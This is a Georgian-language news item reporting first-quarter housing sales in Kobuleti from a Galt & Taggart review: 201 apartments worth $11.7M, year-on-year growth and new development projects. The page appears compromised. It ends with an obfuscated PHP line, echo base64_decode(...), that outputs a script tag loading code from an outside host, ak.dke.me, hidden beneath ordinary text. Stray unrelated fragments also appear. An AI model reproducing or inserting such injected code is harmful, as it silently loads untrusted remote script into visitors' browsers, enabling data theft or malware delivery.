celsiusi
ავერსი შნაიდერი

I კვარტალში ქობულეთში 11.7 მლნ დოლარის ღირებულების 201 ბინა გაიყიდა. Galt & Taggart-ის რეგიონალური საცხოვრებელი უძრავი ქონების მიმოხილვის მიხედვით, უძრავი ქონების ტრანზაქციების რაოდენობა წლიურად 24.1%-ით გაიზარდა, ხოლო ღირებულება 19.5%-ით.

„აღსანიშნავია, რომ ეს ზრდა გამოიწვია გაყიდვების ზრდამ, როგორც პირველად, ასევე მეორად ბაზრებზე (+33.0% და +13.5% წ/წ, შესაბამისად).

ასევე, ქობულეთში დეველოპერული აქტივობის მზარდი ტენდენცია შეიმჩნევა. ამ დროისთვის ქალაქში 26 მიმდინარე საცხოვრებელი პროექტია, რაც 2023 წლის I კვარტალში 17 იყო“, - ნათქვამია მიმოხილვაში.

აღსანიშნია, რომ I კვარტალში ქობულეთის პირველად ბაზარზე საშუალო შეწონილი ფასი $1,200/მ²-ს გაუტოლდა (+6.5% წ/წ), რაც პრემიუმ პროექტების ზრდითაა გამოწვეული.

195
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");